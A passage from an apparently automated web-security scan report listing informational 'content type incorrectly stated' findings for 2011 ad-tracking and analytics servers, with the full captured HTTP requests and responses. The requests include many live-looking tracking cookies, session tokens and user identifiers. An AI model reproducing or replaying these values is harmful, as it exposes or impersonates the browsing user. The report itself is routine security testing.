Cookie: PRID=FC84F463-F810-4805-B5C6-DA875B835084; PRbu=ErB40RtCA; PRvt=CFJ9xErENUwPwYAcUBBeJ6TErNHYxA5IBd7BCeJ5DErTb9CAIFAC9BBeJ7WErTb9avgKAAGBBeJNRErllKsxwcASKBBe; PRgo=BBBAAsJvCBVBF4FRCDhFS!B; PRimp=59AE0400-B34A-1C1C-0309-3510048A0101; PRca=|AJoR*343:1|AKjB*15:2|AK9q*1646:2|AK73*1646:1|AKdX*1153:2|AKfC*298:1|AK8l*9320:1|AJtM*1737:2|AJsM*154:1|AKln*9320:3|AKgy*39173:1|AKfq*9:2|AKcV*1774:3|#; PRcp=|AJoRAAF7:1|AKjBAAF7:1|AKjBAAAP:1|AK9qAA08:2|AK73AA08:1|AKdXAASb:2|AKfCAAEo:1|AK8lAC0U:1|AJtMAA2B:2|AJsMAAC4:1|AKlnAC0U:3|AKgyAKLp:1|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#; PRpl=|FiNl:1|FwPI:1|FwO9:1|FeMB:1|FeMC:1|FdKz:1|FjZG:1|Fj1N:1|FnKl:1|Fgi2:1|FrMI:1|FrMW:1|F2Bj:1|FrlJ:3|Fqr0:1|Fqqc:1|Fqqq:1|Fhqf:3|#; PRcr=|Fz7o:1|GYaN:2|GRns:1|GRno:1|GRQ2:1|GUPB:1|GUPA:1|GVWz:1|GWPi:1|GJ9J:1|GMBD:1|GMud:1|GW7X:3|GV2B:1|GV12:2|GSur:3|#; PRpc=|FiNlFz7o:1|FwPIGYaN:1|FwO9GYaN:1|FeMBGRns:1|FeMCGRno:1|FdKzGRQ2:1|FjZGGUPB:1|Fj1NGUPA:1|FnKlGVWz:1|Fgi2GWPi:1|FrMIGJ9J:1|FrMWGMBD:1|F2BjGMud:1|FrlJGW7X:3|Fqr0GV2B:1|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 02 Oct 2011 23:49:37 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 4218
Set-Cookie:PRvt=CGJ9xErENUwPwYAcUBBeJ6TErNHYxA5IBd7BCeJ5DErTb9CAIFAC9BBeJ7WErTb9avgKAAGBBeJNRErllKsxwcASKBBeKG9ErlmC1SzbAB3BAe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BBBAAsJvCBVBF4FRCDhFS!B;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=59AE0400-D582-DB2C-030A-1BD000770100; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKlp*1278:2|AJoR*343:1|AKjB*15:2|AK9q*1646:2|AK73*1646:1|AKdX*1153:2|AKfC*298:1|AK8l*9320:1|AJtM*1737:2|AJsM*154:1|AKln*9320:3|AKgy*39173:1|AKfq*9:2|AKcV*1774:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKlpAAUc:2|AJoRAAF7:1|AKjBAAF7:1|AKjBAAAP:1|AK9qAA08:2|AK73AA08:1|AKdXAASb:2|AKfCAAEo:1|AK8lAC0U:1|AJtMAA2B:2|AJsMAAC4:1|AKlnAC0U:3|AKgyAKLp:1|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FsBu:2|FiNl:1|FwPI:1|FwO9:1|FeMB:1|FeMC:1|FdKz:1|FjZG:1|Fj1N:1|FnKl:1|Fgi2:1|FrMI:1|FrMW:1|F2Bj:1|FrlJ:3|Fqr0:1|Fqqc:1|Fqqq:1|Fhqf:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GWZl:2|Fz7o:1|GYaN:2|GRns:1|GRno:1|GRQ2:1|GUPB:1|GUPA:1|GVWz:1|GWPi:1|GJ9J:1|GMBD:1|GMud:1|GW7X:3|GV2B:1|GV12:2|GSur:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FsBuGWZl:2|FiNlFz7o:1|FwPIGYaN:1|FwO9GYaN:1|FeMBGRns:1|FeMCGRno:1|FdKzGRQ2:1|FjZGGUPB:1|Fj1NGUPA:1|FnKlGVWz:1|Fgi2GWPi:1|FrMIGJ9J:1|FrMWGMBD:1|F2BjGMud:1|FrlJGW7X:3|Fqr0GV2B:1|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
28.8. http://adserver.teracent.net/tase/ad  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://adserver.teracent.net
Path:   /tase/ad

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /tase/ad?AdBoxType=15&url=virgin.dr.dfa&inv=doubleclick&rnd=1317602293772&esc=0&CustomQuery=eaid%3D245735545%26epid%3D70101326%26esid%3D1128332%26ecid%3D43398155%26ebuy%3D5794457%26 HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://s0.2mdn.net/3268620/PID_1701515_parent_virgin_728.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=N9CZDAH.Q7IPoP; act=a$305#1315313311294_68374606_as3101_clk!1315313297486_68372787_as3103_imp!|; imp=a$le#1317601703104_282600831_ap3104_int|374#1316278116134_138322589_as3104_imp|308#1316265127233_137611811_as3107_imp|305#1315313297486_68372787_as3103_imp|; p161r=b$u-32#A.8Gx|g-yWB#1.8Gx|; p441r=b$u-21#5.8Pr|i-2870764#1.8Pr|; p270r=b$u-7#A.8Qp|i-1401516#1.8Qp|i-1643195#1.8Qp|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1317602404442_239271924_as3101_imp|194#1317602404442_239271924_as3101_imp|374#1316278116134_138322589_as3104_imp|308#1316265127233_137611811_as3107_imp|305#1315313297486_68372787_as3103_imp|; Domain=.teracent.net; Expires=Sat, 31-Mar-2012 00:40:04 GMT; Path=/tase
Set-Cookie: p161r=b$u-32#A.8Gx|g-yWB#1.8Gx|; Domain=.teracent.net; Expires=Sat, 31-Mar-2012 00:40:04 GMT; Path=/
Set-Cookie: p194r=b$u-98#5.8Qp|i-tracking#..2.8Qp.2.8Qp|; Domain=.teracent.net; Expires=Sat, 31-Mar-2012 00:40:04 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 00:40:03 GMT
Content-Length: 2204

resourceServer=http%3A%2F%2Fpcdn.tcgmsrv.net%2Ftase&eventId=1317602404442_239271924_as3101_imp&responseStatus=0&eventUrl=http%3A%2F%2Fadserver.teracent.net%2Ftase%2Fredir%2F1317602404442_239271924_as3
...[SNIP]...
28.9. http://amch.questionmarket.com/adscgen/st.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://amch.questionmarket.com
Path:   /adscgen/st.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /adscgen/st.php?survey_num=928398&site=69802575&code=44069375&randnum=823146 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1_43407814-6-1_43624044-35-1_43407795-6-1_41889545-5-1_41888765-5-2_41888152-5-1_43622021-3-1_43658050-41-1_43749713-14-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us_927907-{w@|M-0_926534-vu@|M-d6_910905-9d[}M-*_925788-AW'~M-0_928398-C|@~M-0_873769-]|@~M-0; LP=1317596202

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:09:55 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
DL_S: b102.dl
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Content-Length: 165
Content-Type: text/html

(function(){
if(1!=4){
(new Image).src="http://amch.questionmarket.com/adsc/d928398/20/44069375/decide.php?ord="+Math.floor((new Date()).getTime()/1000);


}
})();

28.10. http://api.connect.facebook.com/restserver.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://api.connect.facebook.com
Path:   /restserver.php

Issue detail

The response contains the following Content-type statement:The response states that it contains JSON. However, it actually appears to contain plain text.

Request

POST /restserver.php?method=fql.query HTTP/1.1
Host: api.connect.facebook.com
Proxy-Connection: keep-alive
Content-Length: 292
Origin: http://connect.facebook.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
content-type: application/x-www-form-urlencoded
Accept: */*
Referer: http://connect.facebook.net/rsrc.php/v1/yK/r/RIxWozDt5Qq.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

query=SELECT%20total_count%20FROM%20link_stat%20WHERE%20url%3D%22http%3A%2F%2Fhublotnation.com%2F2011%2F09%2F16%2Fhublot-watches-bloghands-on-with-the-classic-fusion-chronograph-yacht-club-de-monaco%2
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=60
Content-Type: application/json
Expires: Sun, 02 Oct 2011 17:04:42 -0700
Pragma:
X-FB-Rev: 451912
X-FB-Server: 10.32.1.103
X-Cnection: close
Date: Mon, 03 Oct 2011 00:03:42 GMT
Content-Length: 21

[{"total_count":389}]
28.11. http://api.facebook.com/method/fql.query  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://api.facebook.com
Path:   /method/fql.query

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /method/fql.query?format=json&query=select%20total_count%20from%20link_stat%20where%20url='undefined'&callback=jsonp1317599923384 HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=60
Content-Type: text/javascript;charset=utf-8
Expires: Sun, 02 Oct 2011 17:01:43 -0700
Pragma:
X-FB-Rev: 451912
X-FB-Server: 10.64.37.42
X-Cnection: close
Date: Mon, 03 Oct 2011 00:00:43 GMT
Content-Length: 23

jsonp1317599923384([]);
28.12. http://ar.voicefive.com/b/rc.pli  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction&n=ar_int_p119936314&1317599990670 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; ar_p108883753=exp=2&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:51:03 2011&prad=65659550&arc=42804711&; ar_p82806590=exp=3&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 25 09:06:26 2011&prad=65097043&arc=40380915&; ar_p119936314=exp=1&initExp=Sun Oct 2 23:59:13 2011&recExp=Sun Oct 2 23:59:13 2011&prad=71054945&arc=43921374&; BMX_3PC=1; UID=9cc29993-80.67.74.150-1314836282; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1317599974%2E004%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 03 Oct 2011 00:01:22 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 42

COMSCORE.BMX.Broker.handleInteraction("");
28.13. http://as00.estara.com/fs/ruleaction.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://as00.estara.com
Path:   /fs/ruleaction.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /fs/ruleaction.php?accountid=200106297609&urid=79044&cookieurid=&estara_fsguid=5860EEFA281121EC93852AEC182A3278&dnc=1317600784907704486 HTTP/1.1
Host: as00.estara.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://travela.priceline.com/hotel/searchResults.do?jsk=5463010a5064010a2011100300091519d011589950&key=gtapcnq5&showDP=y&NYOPRedirNI=null
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsserver__SESSION__=t-501.estara.com; fs_nocache_guid=5860EEFA281121EC93852AEC182A3278; fscookies=b64_XZPLcsMgDEX-xrtm9OSxyLd0nDYz6SJpp3H-vxiDEGFjLke6WJJNAAiBclbSMzKqUk5JlvWyXZ8bOfr.uz4.H3-3c5ATZsgh98VLi0sK2lwYkF9cKjWXdEJSUbAVeUEmfbt9bc9z23--XB-7XiPa.b5v54oJuYNDTOS.bh.3a4Upc7bIKnpkFS4SWEdkFT0SOHgSjEhAsfc4xMhhn8PeTTwRI6yQqJNDDJI9yUb6oGKAvA.gPCGWjs5j3KkNQOUkiGRTzBGXFJFaIV3UC3CJhL2QLgYRT8QT9UQ9IU9okAwqRqropLRo5FRhpLRikF00kkCCuR2ik-JJj0qrGAQ9QSMkOY2CmnIMxndUDsqflNSCD9WDiwrqg0s2Tc7knWN6dY6Tc5yc1TuXForvp1gHEDGMkTZlNmG6IkxXhKmw4AsTjODqqGrkMYjL25VnOrHu.Q8_

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:13:14 GMT
Server: Apache
P3P: CP="NON DSP COR CUR OUR LEG PHY COM", policyref="http://as00.estara.com/w3c/p3p.xml"
Expires: Wed, 11 Nov 1998 11:11:11 GMT
Pragma: no-cache
Set-Cookie: fscookies=b64_XZPLcsMgDEX-xrtm9OSxyLd0nDYz6SJpp3H-vxiDEPHGXI50sSRMAAiBclbSMzKqUk5JlvWyXZ8bOfr.uz4.H3-3c5ATZsgh94eXFpcUtLkwIL.4VGou6YSkomBP5AWZ9O32tT3Pbf39c33sa41o.-u67Ssm5A4OMZH7un3crhWmzNkiq.iRVbhIYB2RVfRI4OBJMCIBxb7jECOHfQ57N-FEjLBCok4OMUj2JBvpg4oB8j6A8oZYOjqPcac2AJWTIJJNMUdcUkRqhXRRD8AlEvZCuhhEPBFP1BP1hDyhQTKoGKmik9KikVOFkdKKQXbRSAIJ5naITsqVHpVWMQh6gkZIchoFNeUYjHtUNsqflNSCD9WDiwrqg0s2Tc7knWN6dY6Tc5yc1TuXForvp1gHEDGMkTZlNmE6IkxHhKmw4AsTjODqqGrkMYjL25VnOjF1N6J8tFX0Dw__; expires=Sat, 01-Oct-2016 00:13:14 GMT; path=/; domain=.estara.com
Content-Length: 8
Content-Type: text/html; charset=UTF-8

if(0){}
28.14. http://ats.tumri.net/ats/ats  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ats.tumri.net
Path:   /ats/ats

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /ats/ats?cmd=RT&AdvertiserID=3052&platform=T&ActionID=17&ActionName=RTALL&ut1=HOTEL;&ut2=&ut3=BOS&ut4=&ut5=US&cachebuster=1230846595 HTTP/1.1
Host: ats.tumri.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://fls.doubleclick.net/activityi;src=1653087;type=hotel756;cat=hotel329;u2=BOS;u3=unknown;u4=unknown;u5=0;u6=0;u7=55.26;u13=1;u15=US;u16=34A63N3;ord=1;num=418599216785?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C=-1000424298|547040017; t_opt=OPT-OUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: t_opt=OPT-OUT; Domain=.tumri.net; Expires=Sat, 21-Oct-2079 03:23:16 GMT; Path=/
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: no-cache
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Expires: Mon Oct 03 00:09:09 UTC 2011
Content-Type: image/jpeg
Date: Mon, 03 Oct 2011 00:09:08 GMT
Content-Length: 807

GIF89a....................................................................................................................................3..f..........3..33.3f.3..3..3..f..f3.ff.f..f..f......3..f....
...[SNIP]...
28.15. http://aud.pubmatic.com/AdServer/Artemis  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://aud.pubmatic.com
Path:   /AdServer/Artemis

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /AdServer/Artemis?dpid=7&group=tech_business_professional&industry=software&location=texas HTTP/1.1
Host: aud.pubmatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ads.pubmatic.com/AdServer/js/dppix.html?p=26071&s=26072&a=21044
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_26072=TMC; KTPCACOOKIE=YES; KRTBCOOKIE_80=1336-f96ee651-9aaf-4db4-bcd2-102cf3b7c015.; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; pubfreq_26072=823-2:1098-2; PUBMDCID=1; pubfreq_26072_21044_238858273=823-1; PMDTSHR=cat:

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:13:00 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.8e-fips-rhel5 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Connection: close
Content-Type: text/html
Content-Length: 7

success
28.16. http://calls.esitemarketing.com/euinc/getnumdata.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://calls.esitemarketing.com
Path:   /euinc/getnumdata.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /euinc/getnumdata.js?var=_vsrkpd.d;acc=CA6phExXGD1qdQFt;cky=rkpd_CA6phExXGD1qdQFt;ref=http%3A%2F%2Fwww.sabre.com%2F;url=http%3A%2F%2Fwww.sabrehospitality.com%2F%3Fesiteurl%3Dsabrehospitalitysolutions.com; HTTP/1.1
Host: calls.esitemarketing.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabrehospitality.com/?esiteurl=sabrehospitalitysolutions.com
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:07:46 GMT
Server: Apache/1.3.36 (Unix) mod_perl/1.29 mod_ssl/2.8.27 OpenSSL/0.9.7g
P3P: CP="NOI COR NID TAI OUR BUS STA"
Content-Type: text/html; charset=UTF-8
Content-Length: 191


_vsrkpd.d = null;
if( _vsrkpd.d ) {
_vsrkpd.set_cookie('rkpd_CA6phExXGD1qdQFt', '', 3600*24);
_vsrkpd.rewrite_document();
}else{
_vsrkpd.getnum_error( 'rewrite not found' );
}


28.17. http://calls.esitemarketing.com/euinc/number-changer.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://calls.esitemarketing.com
Path:   /euinc/number-changer.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /euinc/number-changer.js HTTP/1.1
Host: calls.esitemarketing.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabrehospitality.com/?esiteurl=sabrehospitalitysolutions.com
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:07:44 GMT
Server: Apache/1.3.36 (Unix) mod_perl/1.29 mod_ssl/2.8.27 OpenSSL/0.9.7g
Content-Type: text/html; charset=UTF-8
Content-Length: 8514


// PATENT PENDING

function _vs_popup(url, wid, ht){
var win;
ht = ht || 600;
wid = wid || 650;

win = window.open(url, 'VSPOPUP', "toolbar=no,status=no,location=no,menubar=no,"+

...[SNIP]...
28.18. http://content.pulse360.com/0802A570-D4D3-11E0-8F5A-3A5C91016B62  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://content.pulse360.com
Path:   /0802A570-D4D3-11E0-8F5A-3A5C91016B62

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /0802A570-D4D3-11E0-8F5A-3A5C91016B62 HTTP/1.1
Host: content.pulse360.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home/0,,12306,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pulse360-opt-out=1

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:49:01 GMT
Server: Barista/1.1
Connection: Keep-Alive
Content-Type: text/html
p3p: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Content-Length: 13483

document.write('<style type="text/css"> div#p360-hybrid300x250TriadBlackBlue-0802A570-D4D3-11E0-8F5A-3A5C91016B62 { width: 300px; left: 0; font-family: sans-serif; position: relative; di
...[SNIP]...
28.19. http://content.pulse360.com/D712CB66-D4D2-11E0-ACD9-355C91016B62  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://content.pulse360.com
Path:   /D712CB66-D4D2-11E0-ACD9-355C91016B62

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /D712CB66-D4D2-11E0-ACD9-355C91016B62 HTTP/1.1
Host: content.pulse360.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pulse360-opt-out=1

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:58:10 GMT
Server: Barista/1.1
Connection: Keep-Alive
Content-Type: text/html
p3p: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Content-Length: 1152

document.write('<style type="text/css">.p360_adunit { border: 1px solid #ffffff; width: 466px; height: 58px; background-color: #FFFFFF;}.p360_listing { font-size: 11px; font-family: arial, helv; heigh
...[SNIP]...
28.20. http://content.pulse360.com/F09A1BDE-D4D2-11E0-99F0-875B91016B62  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://content.pulse360.com
Path:   /F09A1BDE-D4D2-11E0-99F0-875B91016B62

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /F09A1BDE-D4D2-11E0-99F0-875B91016B62 HTTP/1.1
Host: content.pulse360.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/SearchResults/?searchQuery=soccor+football+goal+tv+xss&page=2229476&page=2231401&page=2232085&page=2232088&page=2232090&page=2233530&order=date
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
